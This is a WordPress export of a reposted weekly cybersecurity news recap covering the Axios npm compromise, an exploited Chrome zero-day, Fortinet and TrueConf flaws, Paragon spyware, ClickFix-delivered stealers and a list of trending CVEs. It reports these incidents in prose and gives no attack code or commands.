{"id":45160,"date":"2026-04-07T02:55:27","date_gmt":"2026-04-06T18:55:27","guid":{"rendered":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/2026\/04\/07\/weekly-recap-axios-hack-chrome-0-day-fortinet-exploits-paragon-spyware-and-more\/"},"modified":"2026-04-07T02:55:27","modified_gmt":"2026-04-06T18:55:27","slug":"weekly-recap-axios-hack-chrome-0-day-fortinet-exploits-paragon-spyware-and-more","status":"publish","type":"post","link":"https:\/\/nuoya.nuoyayasuo.top\/index.php\/2026\/04\/07\/weekly-recap-axios-hack-chrome-0-day-fortinet-exploits-paragon-spyware-and-more\/","title":{"rendered":"&#9889; Weekly Recap: Axios Hack, Chrome 0-Day, Fortinet Exploits, Paragon Spyware and More"},"content":{"rendered":"<div style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiZyEpyaWHYHm8-TyNZQgYtoAqrsAUDZ0_onxgp1BUSV0khgAkwy7S9fMT75sRAm2blJXN6xw6i4r0fXP_hayN2Afrr7ul6egJc2nvFJUoWqmy0iJCr5JdK9-915pCFpEtRdlOMb-BYexGAPQPdKnGjWPbPlfGFx5qOo5Dhzfjes7_k-s5bYgFDEyMCT5BJ\/s1600\/recaps.jpg\" style=\"clear: left; display: block; float: left; padding: 1em 0px; text-align: center;\"><img decoding=\"async\" border=\"0\" data-original-height=\"470\" data-original-width=\"900\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiZyEpyaWHYHm8-TyNZQgYtoAqrsAUDZ0_onxgp1BUSV0khgAkwy7S9fMT75sRAm2blJXN6xw6i4r0fXP_hayN2Afrr7ul6egJc2nvFJUoWqmy0iJCr5JdK9-915pCFpEtRdlOMb-BYexGAPQPdKnGjWPbPlfGFx5qOo5Dhzfjes7_k-s5bYgFDEyMCT5BJ\/s1600\/recaps.jpg\" alt=\"&amp;#9889; Weekly Recap: Axios Hack, Chrome 0-Day, Fortinet Exploits, Paragon Spyware and More\" \/><\/a><\/div>\n<p>This&nbsp;week had real hits. The&nbsp;key software got tampered with. Active&nbsp;bugs showed up in the tools people use every day. Some&nbsp;attacks didn&#8217;t even need much effort because the path was already&nbsp;there.<\/p>\n<p>One weak spot now spreads wider than before. What&nbsp;starts small can reach a lot of systems fast. New&nbsp;bugs, faster use, less time to&nbsp;react.<\/p>\n<p>That&#8217;s this week. Read&nbsp;through&nbsp;it.<\/p>\n<h2 style=\"text-align: left;\"><strong>&#9889; Threat of the&nbsp;Week<\/strong><\/h2>\n<p><strong><a href=\"https:\/\/thehackernews.com\/2026\/04\/unc1069-social-engineering-of-axios.html\">Axios npm Package Compromised by N. Korean&nbsp;Hackers<\/a><\/strong>&#8212;Threat actors with ties to North Korea seized control of the npm account belonging to the lead maintainer of Axios, a popular npm package with nearly 100 million weekly downloads, to push malicious versions containing a cross-platform malware dubbed WAVESHAPER.V2. The&nbsp;activity has been attributed to a financially motivated threat actor known as UNC1069. The&nbsp;incident demonstrates how quickly the compromise of a popular npm package can have ripple effects through the ecosystem. The&nbsp;malware&#8217;s self-deleting anti-forensic cleanup points to a deliberate, planned operation. &#8220;The build pipeline is becoming the new front line. Attackers know that if they can compromise the systems that build and distribute software, they can inherit trust at scale,&#8221; Avital Harel, Security Researcher at Upwind, said. &#8220;That&#8217;s what makes these attacks so dangerous &#8212; they&#8217;re not just targeting one application, they&#8217;re targeting the process behind many of them. Organizations should be looking much more closely at CI\/CD systems, package dependencies, and developer environments, because that&#8217;s increasingly where attackers are placing their bets.&#8221; Ismael Valenzuela, vice president of Labs, Threat Research, and Intelligence at Arctic Wolf, said the Axios npm compromise reflects a broader trend where attackers infiltrate trusted, widely used software components to obtain access to downstream customers at scale. &#8220;Even though the malicious versions were available for only a few hours, Axios is so deeply embedded across enterprise applications that organizations may have unknowingly pulled the compromised code into their environments through build pipelines or downstream dependencies,&#8221; Valenzuela added. &#8220;That downstream exposure is what makes these incidents particularly difficult to spot and contain, especially for teams that never directly chose to install Axios themselves. This&nbsp;incident reinforces that security teams need to treat build&#8209;time tools and dependencies as part of the attack surface and not just trust tools by&nbsp;default.&#8221;<\/p>\n<p>  <a name=\"more\"><\/a> <\/p>\n<style>.recap-link { text-decoration: none !important; color: inherit;}.recap-ad {display: flex ; flex-direction: column; max-width: 728px; margin: 40px auto; overflow: hidden; text-align: left; border-top: 10px solid #f2f6ff; border-bottom: 10px solid #f2f6ff; padding: 20px 0;}\/* Image Styling *\/.recap-ad img { width: 100%; height: auto; border-radius: 10px; object-fit: cover;}\/* Headline & Description Styling *\/.recap-ad h2 { font-size: 22px; color: #1a1a1a; margin: 15px 0 10px; font-weight: 600; line-height: 1.3;}.recap-ad p, .recap-ad div, .recap-ad ul li { font-size: 15px; color: #333; line-height: 24px; font-weight: 400; margin-bottom: 15px;}\/* CTA Button *\/.recap-ad .button-style { background-color:#182e58; color:#fff !important; padding: 10px 18px; font-size: 16px; border-radius: 6px; cursor: pointer; transition: background-color 0.3s ease, transform 0.2s ease; text-align: center; font-weight: 500; width: fit-content; display: inline-block; text-decoration: none;}.recap-ad .button-style:hover { background-color:#182e58; transform: translateY(-2px);text-decoration: none;}<\/style>\n<div>   \t\t<a aria-label=\"2026 Cyber Workforce\" href=\"https:\/\/thehackernews.uk\/sans-cyber-workforce-2026\" target=\"_blank\">         <img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjcncK3X0HKzLh0nQ3JPxLaVIttNOxuJ1iWUXzwp3IWvE-JUxm-CQXZBcwNdkSAZ4AcTFYW3Zznuz4uyo3ZdfQOVzvEADTDOKQYQy5Ot0IrSpHZyt6aayFRc4k4V_jDP5aY90kBavqrIDJJGbHUdxEPUPuRtoYhdZ0XC9zIeK6NsI-gQfQUDaf_cJt6omIE\/s1600\/sans.jpg\" title=\"2026 Cyber Workforce\" alt=\"&amp;#9889; Weekly Recap: Axios Hack, Chrome 0-Day, Fortinet Exploits, Paragon Spyware and More\" \/>         <\/p>\n<h2>Inside the 2026 Cyber Workforce: Skills, Shortages, and Shifts in the Age of AI<\/h2>\n<p>Insights to help leaders make informed decisions and show practitioners where careers are heading.<\/p>\n<p>         <\/a>          <a href=\"https:\/\/thehackernews.uk\/sans-cyber-workforce-2026\" target=\"_blank\">Download Now &#10141;<\/a> <\/div>\n<h2 style=\"text-align: left;\"><strong>\ud83d\udd14 Top&nbsp;News<\/strong><\/h2>\n<ul>\n<li><strong><a href=\"https:\/\/thehackernews.com\/2026\/04\/new-chrome-zero-day-cve-2026-5281-under.html\">Google Patches Actively Exploited Chrome 0-Day<\/a><\/strong>&#8212;Google released security updates for its Chrome web browser to address 21 vulnerabilities, including a zero-day flaw that it said has been exploited in the wild. The&nbsp;high-severity vulnerability, CVE-2026-5281 (CVSS score: N\/A), concerns a use-after-free bug in Dawn, an open-source and cross-platform implementation of the WebGPU standard. Users&nbsp;are advised to update their Chrome browser to versions 146.0.7680.177\/178 for Windows and Apple macOS, and 146.0.7680.177&nbsp;for Linux. Google&nbsp;did not reveal how the vulnerability is being exploited and who is behind the exploitation effort.<\/li>\n<li><strong><a href=\"https:\/\/thehackernews.com\/2026\/03\/trueconf-zero-day-exploited-in-attacks.html\">TrueConf 0-Day Exploited in Attacks Targeting Government Entities in Southeast Asia<\/a><\/strong>&#8212;Chinese hackers have exploited a zero-day vulnerability in the TrueConf video conferencing software in attacks against government entities in Southeast Asia. The&nbsp;exploited flaw, tracked as CVE-2026-3502 (CVSS score of 7.8), exists because of a lack of integrity checks when fetching application update code, allowing an attacker to distribute a tampered update. &#8220;The compromised TrueConf on-premises server was operated by the governmental IT department and served as a video conferencing platform for dozens of government entities across the country, which were all supplied with the same malicious update,&#8221; Check Point said. The&nbsp;activity, which began in January 2026, involved the deployment of the Havoc framework. Most&nbsp;infections likely began with a link sent to the victims. TrueConf is used widely across organizations in Asia, Europe, and the Americas, serving about 100,000 organizations globally.<\/li>\n<li><strong><a href=\"https:\/\/thehackernews.com\/2026\/04\/fortinet-patches-actively-exploited-cve.html\">Fortinet FortiClient EMS Flaw Under Attack<\/a><\/strong>&#8212;Fortinet released out-of-band patches for a critical security flaw impacting FortiClient EMS (CVE-2026-35616) that it said has been exploited in the wild. The&nbsp;vulnerability has been described as a pre-authentication API access bypass leading to privilege escalation. Exploitation efforts against CVE-2026-35616 were first recorded against its honeypots on March 31, 2026, per watchTowr. The&nbsp;development comes days after another recently patched, critical vulnerability in FortiClient EMS (CVE-2026-21643) came under active exploitation.<\/li>\n<li><strong><a href=\"https:\/\/thehackernews.com\/2026\/04\/apple-expands-ios-1877-update-to-more.html\">Apple Backports DarkSword Fixes to More Devices<\/a><\/strong>&#8212;Apple expanded the availability of iOS 18.7.7&nbsp;and iPadOS 18.7.7&nbsp;to a broader range of devices to protect users from the risk posed by a recently disclosed exploit kit known as DarkSword. The&nbsp;update targets customers whose devices are capable of upgrading to the newest operating system (iOS 26), but have chosen to remain on iOS 18. Apple&nbsp;has taken the unprecedented step to counter risks posed by an exploit kit called DarkSword. The&nbsp;broader availability of the patches underscores the level of threat that malware like DarkSword poses. The&nbsp;fact that a large number of users were still using iOS 18, combined with the leak of a new version of DarkSword on GitHub, has pushed Apple towards releasing the fix so that they can stay protected without the need for updating to iOS 26. The&nbsp;leak is significant as it puts it within reach of less technically savvy cybercriminals out there.<\/li>\n<li><strong><a href=\"https:\/\/thehackernews.com\/2026\/03\/deepload-malware-uses-clickfix-and-wmi.html\">ClickFix Attack Leads to DeepLoad Malware<\/a><\/strong>&#8212;The ClickFix technique is being used to deliver a stealthy malware named DeepLoad that&#8217;s capable of stealing credentials and intercepting browser interactions. The&nbsp;malware first emerged on a dark web cybercrime forum in early February 2026, when a threat actor, using the alias &#8220;MysteryHack,&#8221; advertised it as a &#8220;centralized panel for multiple types of malware.&#8221; According to <a href=\"https:\/\/www.zerofox.com\/intelligence\/flash-report-cryptocurrency-stealer-for-sale-on-dark-web\/\">ZeroFox<\/a>, &#8220;DeepLoad&#8217;s design is explicitly focused on actively facilitating real-time cryptocurrency theft, which almost certainly makes it an attractive malware suite in the cybercrime-as-a-service (CaaS) environment.&#8221; The malware has since been distributed to Windows systems through ClickFix under the guise of resolving fake browser error messages. Besides stealing credentials, the malware drops a rogue browser extension to intercept sensitive data and spreads via removable USB drives. DeepLoad&#8217;s actual attack logic is buried under layers of obfuscation, raising the possibility that some parts of the malware were developed using an artificial intelligence (AI) model.<\/li>\n<li><strong><a href=\"https:\/\/thehackernews.com\/2026\/04\/claude-code-tleaked-via-npm-packaging.html\">Claude Code Source Code Leaks<\/a><\/strong>&#8212;Anthropic acknowledged that internal code for its popular artificial intelligence (AI) coding assistant, Claude Code, had been inadvertently released due to a human error. Essentially, what happened was this: When Anthropic pushed out version 2.1.88&nbsp;of its Claude Code npm package, it accidentally included a map file that exposed nearly 2,000 source code files and more than 512,000 lines of code. The&nbsp;<a href=\"https:\/\/github.com\/zackautocracy\/claude-code\">source code leak<\/a> has since <a href=\"https:\/\/ccleaks.com\/\">revealed<\/a> various features the company appears to be working on or that are built into the service, including an Undercover mode to hide AI authorship from contributions to public code repositories, a persistent background agent called KAIROS, combat distillation attacks, and <a href=\"https:\/\/alex000kim.com\/posts\/2026-03-31-claude-code-source-leak\/#frustration-detection-via-regex-yes-regex\">active monitoring<\/a> of words and phrases that show signs of user frustration. The&nbsp;leak also quickly escalated into a cybersecurity threat, as attackers pounced on the surge in interest to lure developers into downloading stealer malware.<\/li>\n<\/ul>\n<h2 style=\"text-align: left;\"><strong>\ud83d\udd25 Trending&nbsp;CVEs<\/strong><\/h2>\n<p>New vulnerabilities show up every week, and the window between disclosure and exploitation keeps getting shorter. The&nbsp;flaws below are this week&#8217;s most critical &#8212; high-severity, widely used software, or already drawing attention from the security community.<\/p>\n<p>Check these first, patch what applies, and don&#8217;t wait on the ones marked urgent&nbsp;&#8212; <a href=\"https:\/\/thehackernews.com\/2026\/04\/fortinet-patches-actively-exploited-cve.html\">CVE-2026-35616<\/a> (Fortinet FortiClient&nbsp;EMS), <a href=\"https:\/\/thehackernews.com\/2026\/04\/cisco-patches-98-cvss-imc-and-ssm-flaws.html\">CVE-2026-20093<\/a> (Cisco Integrated Management Controller), <a href=\"https:\/\/thehackernews.com\/2026\/04\/cisco-patches-98-cvss-imc-and-ssm-flaws.html\">CVE-2026-20160<\/a> (Cisco Smart Software Manager&nbsp;On-Prem), <a href=\"https:\/\/thehackernews.com\/2026\/04\/new-chrome-zero-day-cve-2026-5281-under.html\">CVE-2026-5281<\/a> (Google&nbsp;Chrome), <a href=\"https:\/\/thehackernews.com\/2026\/03\/trueconf-zero-day-exploited-in-attacks.html\">CVE-2026-3502<\/a> (TrueConf), <a href=\"https:\/\/grafana.com\/blog\/grafana-security-release-critical-and-high-severity-security-fixes-for-cve-2026-27876-and-cve-2026-27880\/\">CVE-2026-27876, CVE-2026-27880<\/a> (Grafana), <a href=\"https:\/\/kb.cert.org\/vuls\/id\/655822\">CVE-2026-4789<\/a> (Kyverno), <a href=\"https:\/\/kb.cert.org\/vuls\/id\/221883\">CVE-2026-2275, CVE-2026-2285, CVE-2026-2286, CVE-2026-2287<\/a>&nbsp;(CrewAI), <a href=\"https:\/\/notepad-plus-plus.org\/news\/v893-released\/\">CVE-2025-14819<\/a> (Notepad++), <a href=\"https:\/\/github.com\/vim\/vim\/security\/advisories\/GHSA-2gmj-rpqf-pxvh\">CVE-2026-34714<\/a>, <a href=\"https:\/\/github.com\/vim\/vim\/security\/advisories\/GHSA-8h6p-m6gr-mpw9\">CVE-2026-34982<\/a>&nbsp;(<a href=\"https:\/\/blog.calif.io\/p\/mad-bugs-vim-vs-emacs-vs-claude\">Vim<\/a>), <a href=\"https:\/\/github.com\/n8n-io\/n8n\/security\/advisories\/GHSA-58qr-rcgv-642v\">CVE-2026-33660<\/a>, <a href=\"https:\/\/github.com\/n8n-io\/n8n\/security\/advisories\/GHSA-mxrg-77hm-89hv\">CVE-2026-33696<\/a>&nbsp;(n8n), <a href=\"https:\/\/github.com\/axios\/axios\/security\/advisories\/GHSA-43fc-jf86-j433\">CVE-2026-25639<\/a>&nbsp;(Axios), <a href=\"https:\/\/www.strongswan.org\/blog\/2026\/03\/23\/strongswan-vulnerability-(cve-2026-25075).html\">CVE-2026-25075<\/a>&nbsp;(<a href=\"https:\/\/bishopfox.com\/blog\/strongswan-cve-2026-25075-integer-underflow-in-vpn-authentication\">strongSwan<\/a>), <a href=\"https:\/\/github.com\/nocobase\/nocobase\/security\/advisories\/GHSA-px3p-vgh9-m57c\">CVE-2026-34156<\/a> (NocoBase), <a href=\"https:\/\/kb.cert.org\/vuls\/id\/951662\">CVE-2026-3308<\/a> (Artifex&nbsp;MuPDF), <a href=\"https:\/\/www.cisa.gov\/news-events\/ics-advisories\/icsa-26-090-02\">CVE-2026-1579<\/a> (PX4 Autopilot), <a href=\"https:\/\/labs.infoguard.ch\/advisories\/cve-2026-3991_symantec-dlp-agent_local-privilege-escalation\/\">CVE-2026-3991<\/a> (Symantec Data Loss Prevention Agent for&nbsp;Windows), <a href=\"https:\/\/github.com\/0xJacky\/nginx-ui\/security\/advisories\/GHSA-fhh2-gg7w-gwpq\">CVE-2026-33026<\/a> (nginx-ui), <a href=\"https:\/\/github.com\/pnggroup\/libpng\/security\/advisories\/GHSA-m4pc-p4q3-4c7j\">CVE-2026-33416<\/a>, <a href=\"https:\/\/github.com\/pnggroup\/libpng\/security\/advisories\/GHSA-wjr5-c57x-95m2\">CVE-2026-33636<\/a>&nbsp;(libpng), <a href=\"https:\/\/www.foxit.com\/support\/security-bulletins.html\">CVE-2026-3775, CVE-2026-3779<\/a> (Foxit PDF&nbsp;Editor), <a href=\"https:\/\/heyitsas.im\/posts\/cups\/\">CVE-2026-34980, CVE-2026-34990<\/a> (CUPS),&nbsp;and <a href=\"https:\/\/www.tp-link.com\/us\/support\/faq\/5047\/\">CVE-2026-34121<\/a> (TP-Link).<\/p>\n<h2 style=\"text-align: left;\"><strong>\ud83c\udfa5 Cybersecurity&nbsp;Webinars<\/strong><\/h2>\n<ul>\n<li><a href=\"https:\/\/thehacker.news\/identity-maturity-2026?source=recap\">Learn How to Close Identity Gaps Using Insights from IT Leaders<\/a> &#8594; Identity programs face rising risk from disconnected apps, manual credentials, and expanding AI access. Based on 2026 insights from 600+ IT and security leaders, this session shows what to measure, fix, and do now to close identity gaps and regain control.<\/li>\n<li><a href=\"https:\/\/thehacker.news\/ghost-in-the-machine?source=recap\">Learn How to Build Secure AI Agents Using Identity, Visibility, and Control<\/a> &#8594; AI agents are already being used, but most teams don&#8217;t know how to secure them properly. This session shows a clear, practical way to do it using three key ideas: identity, visibility, and control.You will see what real deployment looks like, how to track what agents do, and how to manage their behavior safely.It also explains how to secure AI systems today without waiting for standards to settle.<\/li>\n<\/ul>\n<h2 style=\"text-align: left;\"><strong>\ud83d\udcf0 Around the Cyber&nbsp;World<\/strong><\/h2>\n<ul>\n<li><strong>Device Code Phishing Attacks Surge <\/strong>&#8212;<a href=\"https:\/\/thehackernews.com\/2026\/03\/device-code-phishing-hits-340-microsoft.html\">Device code phishing attacks<\/a>, which abuse the OAuth device authorization grant flow to hijack accounts, have surged more than 37.5x&nbsp;this year. Push&nbsp;Security said it detected a 15x increase in device code phishing pages at the start of March 2026, indicating that the technique has finally entered mainstream adoption. &#8220;The technique tricks a user into issuing access tokens for an attacker-controlled application (not a device, confusingly),&#8221; the company <a href=\"https:\/\/pushsecurity.com\/blog\/device-code-phishing\/\">said<\/a>. &#8220;Any app that supports device code logins can be a target. Popular examples include Microsoft, Google, Salesforce, GitHub, and AWS. That&nbsp;said, Microsoft is, as always, much more heavily targeted at scale now than any other app.&#8221; This has been fueled by the emergence of EvilTokens (aka ANTIBOT), the first reported criminal PhaaS (Phishing-as-a-Service) toolkit that supports device code pushing. EvilTokens features a Cloudflare Workers frontend and a Railway backend for authentication. Early&nbsp;iterations of the PhaaS kit emerged in January 2026. Another closed-source PhaaS kit called Venom offers device code phishing capabilities similar to EvilTokens. Some&nbsp;of the other PhaaS kits that have incorporated this technique include SHAREFILE, CLURE, LINKID, AUTHOV, DOCUPOLL, FLOW_TOKEN, PAPRIKA, DCSTATUS, and DOLCE.<\/li>\n<li><strong>LinkedIn Comes Under Scanner for BrowserGate <\/strong>&#8212;A newly published report called BrowserGate alleged that Microsoft&#8217;s LinkedIn is using hidden JavaScript scripts on its website to scan visitors&#8217; browsers for thousands of installed Google Chrome extensions and collect device data without users&#8217; consent. &#8220;LinkedIn scans for over 200 products that directly compete with its own sales tools, including Apollo, Lusha, and ZoomInfo,&#8221; the report <a href=\"https:\/\/browsergate.eu\/\">said<\/a>. &#8220;Because LinkedIn knows each user&#8217;s employer, it can map which companies use which competitor products. It&nbsp;is extracting the customer lists of thousands of software companies from their users&#8217; browsers without anyone&#8217;s knowledge. Then&nbsp;it uses what it finds. LinkedIn has already sent enforcement threats to users of third-party tools, using data obtained through this covert scanning to identify its targets.&#8221; The report also claimed LinkedIn loads an invisible tracking pixel from HUMAN Security, along with a separate fingerprinting script that runs from LinkedIn&#8217;s servers and a third script from Google that runs silently on every page load. In&nbsp;response to the findings, LinkedIn <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/linkedin-secretely-scans-for-6-000-plus-chrome-extensions-collects-data\/\">told<\/a> Bleeping Computer it scans for certain extensions that scrape data without members&#8217; consent in violation of its terms of service. The&nbsp;company also claimed the report is from an individual who is &#8220;subject to an account restriction for scraping and other violations of LinkedIn&#8217;s Terms of Service.&#8221;<\/li>\n<li><strong>ICE Confirms Use of Paragon Spyware <\/strong>&#8212;The U.S. Immigration and Customs Enforcement (ICE) <a href=\"https:\/\/cyberscoop.com\/ice-using-paragon-spyware-house-democrats-letter\/\">confirmed<\/a> it uses spyware developed by Paragon to &#8220;identify, disrupt, and dismantle Foreign Terrorist Organizations, addressing the escalating fentanyl epidemic and safeguarding national security.&#8221; Paragon&#8217;s Graphite spyware has been found on the phones of journalists. WhatsApp last year <a href=\"https:\/\/thehackernews.com\/2026\/04\/whatsapp-alerts-200-users-after-fake.html\">said<\/a> it disrupted a campaign that deployed the spyware against its users. The&nbsp;governments of Australia, Canada, Cyprus, Denmark, Israel, and Singapore are <a href=\"https:\/\/thehackernews.com\/2025\/03\/six-governments-likely-use-israeli.html\">suspected<\/a> to be customers of the Israeli company.<\/li>\n<li><strong>Ex-Engineer Pleads Guilty to Extortion Campaign <\/strong>&#8212;Daniel Rhyne, 59, of Kansas City, Missouri, <a href=\"https:\/\/www.justice.gov\/usao-nj\/pr\/former-employee-national-industrial-company-pleads-guilty-crimes-related-hacking\">pleaded guilty<\/a> to a failed data extortion campaign that targeted his former employer. Rhyne&nbsp;was <a href=\"https:\/\/thehackernews.com\/2024\/09\/ex-engineer-charged-in-missouri-for.html\">arrested<\/a> in September 2024. According to court documents, Rhyne worked as a core infrastructure engineer at a U.S.-based industrial company headquartered in New Jersey. In&nbsp;November 2023, the defendant executed a ransomware attack against the company and sent an extortion email to its employees, threatening to continue shutting down the firm&#8217;s servers unless he was paid about 20 Bitcoin, which was valued at $750,000 at the time. Last&nbsp;month, the U.S. Justice Department (DoJ) announced the conviction of Cameron Curry (aka Loot), a 27-year-old from Charlotte, North Carolina, for carrying out a cyber extortion scheme against a D.C.-based international technology company called Brightly Software. &#8220;Trial evidence established that Curry misused his position to access the victim company&#8217;s personnel and other sensitive corporate records, which he then used to carry out the cyber extortion scheme after he learned that his contract was not going to be renewed and that he would no longer be employed by the company,&#8221; the DoJ <a href=\"https:\/\/www.justice.gov\/usao-dc\/pr\/north-carolina-man-convicted-cyber-extortion-scheme-targeted-dc-based-tech-company\">said<\/a>. Between December 11, 2023, and January 24, 2024, Curry sent more than 60 emails to company executives and employees, stating he would disclose sensitive information unless he was paid $2.5&nbsp;million in cryptocurrency. Brightly ended up paying $7,540 in Bitcoin.<\/li>\n<li><strong>Residential Proxies Bypass Reputation Systems <\/strong>&#8212;Threat intelligence firm GreyNoise&#8217;s analysis of 4 billion sessions targeting the edge over a 90-day period from November 29, 2025, to February 27, 2026, found that 39% of unique IP addresses targeting the edge originated from home internet connections, and that 78% vanish before any reputation system can flag them. &#8220;78% of residential IPs appear in only 1&#8211;2 sessions and are never observed again,&#8221; it <a href=\"https:\/\/www.greynoise.io\/blog\/invisible-army-why-ip-reputation-fails-against-rotation-economy\">said<\/a>. &#8220;IP reputation is structurally broken against residential proxies. The&nbsp;rotation rate exceeds the update cycle of any feed-based defense.&#8221; This behavior also makes source IPs indistinguishable from a legitimate user&#8217;s connection. The&nbsp;data also showed that 0.1% of residential sessions carry exploitation payloads, in contrast to 1.0% from hosting infrastructure, indicating that they are primarily used for network scanning and reconnaissance. The&nbsp;residential proxy traffic is generated by IoT botnets and infected computers, with the networks also resilient against takedown efforts. &#8220;After IPIDEA lost 40% of its nodes, operators backfilled within weeks,&#8221; GreyNoise said. &#8220;Every major takedown produces the same result &#8212; temporary disruption, then regeneration.&#8221; The company also recommended that &#8220;Detection must shift from &#8216;where is the traffic from?&#8217; to &#8216;what is the traffic doing?&#8221; Device fingerprinting provides more durable detection because fingerprints survive IP rotation.&#8221;<\/li>\n<li><strong>Suspected N. Korea&nbsp;Campaign Targets Cryptocurrency Companies Using React2Shell <\/strong>&#8212;A new campaign has been observed systematically compromising cryptocurrency organizations by exploiting web application vulnerabilities such as <a href=\"https:\/\/thehackernews.com\/2025\/12\/north-korea-linked-actors-exploit.html\">React2Shell<\/a> (CVE-2025-55182), pillaging AWS tenants with valid credentials, and exfiltrating proprietary exchange software containing hardcoded secrets. &#8220;Their targeting spans the crypto supply chain, from staking platforms, to exchange software providers, to the exchanges themselves,&#8221; Ctrl-Alt-Intel <a href=\"https:\/\/ctrlaltintel.com\/research\/DPRK-Crypto-Heist\/\">said<\/a>. The&nbsp;threat intelligence firm has assessed the activity with moderate confidence to be aligned with North Korean cryptocurrency theft operations.<\/li>\n<li><strong>India Extends SIM-Binding Mandate <\/strong>&#8212;The Indian government has extended its <a href=\"https:\/\/thehackernews.com\/2025\/12\/india-orders-messaging-apps-to-work.html\">SIM-binding mandate<\/a> through December 31, 2026, while shelving plans to require messaging apps to forcibly log out web-based sessions like WhatsApp Web every six hours. The&nbsp;decision <a href=\"https:\/\/www.thehindu.com\/sci-tech\/technology\/government-shelves-periodic-web-logout-for-chat-apps-extends-sim-binding-to-december-31\/article70811929.ece\">comes<\/a> after the Broadband India Forum, which represents Meta and Google, warned the Department of Telecommunications (DoT) that the directions were unconstitutional. Under&nbsp;the framework announced in November 2025, a messaging app account would be tied exclusively to the physical SIM card during registration. This&nbsp;meant that the users could access the messages and other content only when that SIM is present in the device. Companies were given 90 days (i.e., until the end of February 2026) to comply. While&nbsp;SIM binding has been proposed as a way to combat spammers and conduct cross&#8209;border fraud, the move has raised feasibility and user experience concerns. According to Moneycontrol, WhatsApp is <a href=\"https:\/\/www.moneycontrol.com\/news\/business\/dot-extends-sim-binding-deadline-for-whatsapp-telegram-signal-to-year-end-13876716.html\">said<\/a> to be beta testing SIM binding on Android.<\/li>\n<li><strong>Russian Threat Actors Looking to Regain Access Through Compromised Infrastructure <\/strong>&#8212;Russian threat actors like APT28 and Void Blizzard are attempting to regain access to computer systems they previously compromised to check if access is still available and whether the obtained credentials remain valid, CERT-UA has warned. &#8220;Unfortunately, these attempts sometimes succeed if the root cause of the initial incident has not been completely eliminated,&#8221; the agency <a href=\"https:\/\/cip.gov.ua\/ua\/statics\/analitichni-materiali-derzhspeczv-yazku\">said<\/a>.<\/li>\n<li><strong>OkCupid Settles with FTC for Privacy Violations <\/strong>&#8212;OkCupid and its owner, Match Group, <a href=\"https:\/\/www.ftc.gov\/news-events\/news\/press-releases\/2026\/03\/ftc-takes-action-against-match-okcupid-deceiving-users-sharing-personal-data-third-party\">reached<\/a> a settlement with the U.S. Federal Trade Commission over allegations that it did not inform its customers that nearly three million user photos were shared with Clarifai, a company that develops AI systems to identify and analyze images and videos. The&nbsp;complaint also accused the dating site of sharing users&#8217; location information and other details without their consent. As&nbsp;part of the settlement, OkCupid and Match did not admit or deny the allegations but agreed to a permanent prohibition that prevents them from misrepresenting how they use and share personal data.<\/li>\n<li><strong>New Android Malware Mirax Advertised <\/strong>&#8212;A sophisticated new Android banking trojan named <a href=\"https:\/\/x.com\/KrakenLabs_Team\/status\/2029525839860163010\">Mirax<\/a> is being advertised as a private malware-as-a-service (MaaS) offering for up to $2,500 per month. The&nbsp;malware enables customers to gain remote control over devices and includes specialized overlays for more than 700 different financial applications to steal credentials and other sensitive information. It&nbsp;can also capture keystrokes, intercept SMS messages, record lock screen patterns, and use the infected device as a SOCKS5 proxy.<\/li>\n<li><strong>Venom Stealer Spreads via ClickFix <\/strong>&#8212;A new malware-as-a-service (MaaS) platform dubbed <a href=\"https:\/\/www.blackfog.com\/venom-stealer-turns-clickfix-into-a-full-exfiltration-pipeline\/\">Venom Stealer<\/a> is being sold on cybercrime forums as a subscription ($250\/month to $1,800 for lifetime access). It&#8217;s marketed as &#8220;the Apex Predator of Wallet Extraction.&#8221; Unlike other stealers, it automates credential theft and enables continuous data exfiltration. &#8220;It builds <a href=\"https:\/\/thehackernews.com\/2026\/02\/microsoft-discloses-dns-based-clickfix.html\">ClickFix<\/a> social engineering directly into the operator panel, automates every step after initial access, and creates a continuous exfiltration pipeline that does not end when the initial payload finishes running,&#8221; BlackFog said. The&nbsp;development coincides with a new <a href=\"https:\/\/www.cyberproof.com\/blog\/the-clickfix-evolution-new-variant-replaces-powershell-with-rundll32-and-webdav\/\">ClickFix variant<\/a> that replaces PowerShell with a &#8220;rundll32.exe&#8221; command to download a DLL from an attacker-controlled WebDAV resource. The&nbsp;attack leads to the execution of a secondary loader called SkimokKeep, which then downloads additional payloads, while incorporating anti-sandboxing and anti-debugging mechanisms. In&nbsp;the meantime, <a href=\"https:\/\/mp.weixin.qq.com\/s\/0M1sZq1HqwAAaMbRDBEZEw\">recent ClickFix campaigns<\/a> have also leveraged searches for installation tutorials for OpenClaw, Claude, and other AI tools, as well as for common macOS issues to push stealer malware like <a href=\"https:\/\/thehackernews.com\/2026\/03\/clickfix-campaigns-spread-macsync-macos.html\">MacSync<\/a>.<\/li>\n<li><strong>More Information Stealers Spotted <\/strong>&#8212;Speaking of stealers, recent campaigns have also been observed using procurement-themed email lures and fake Homebrew install guides served via sponsored search results to deliver <a href=\"https:\/\/www.group-ib.com\/blog\/phantom-stealer-credential-theft\/\">Phantom Stealer<\/a> and <a href=\"https:\/\/github.com\/PaloAltoNetworks\/Unit42-timely-threat-intel\/blob\/main\/2026-03-31-SHub-Stealer-Activity.txt\">SHub Stealer<\/a>. Some&nbsp;other newly discovered infostealer malware families include <a href=\"https:\/\/www.varonis.com\/blog\/storm-infostealer\">Storm<\/a>, <a href=\"https:\/\/www.levelblue.com\/blogs\/spiderlabs-blog\/say-my-name-how-miolab-is-building-macos-stealer-empire\">MioLab<\/a>, and <a href=\"https:\/\/www.gendigital.com\/blog\/insights\/research\/torg-grabber-credential-stealer-analysis\">Torg Grabber<\/a>. In&nbsp;a related development, CyberProof <a href=\"https:\/\/www.cyberproof.com\/blog\/a-deep-dive-into-pxa-stealer\/\">said<\/a> it observed a surge in <a href=\"https:\/\/thehackernews.com\/2026\/02\/microsoft-warns-python-infostealers.html\">PXA Stealer<\/a> activity targeting global financial institutions during Q1 2026. Another malware that has <a href=\"https:\/\/www.splunk.com\/en_us\/blog\/security\/blankgrabber-trojan-stealer-analysis-detection.html\">gained notoriety<\/a> is BlankGrabber, which is distributed through social engineering and phishing campaigns. Data&nbsp;gathered by Flare <a 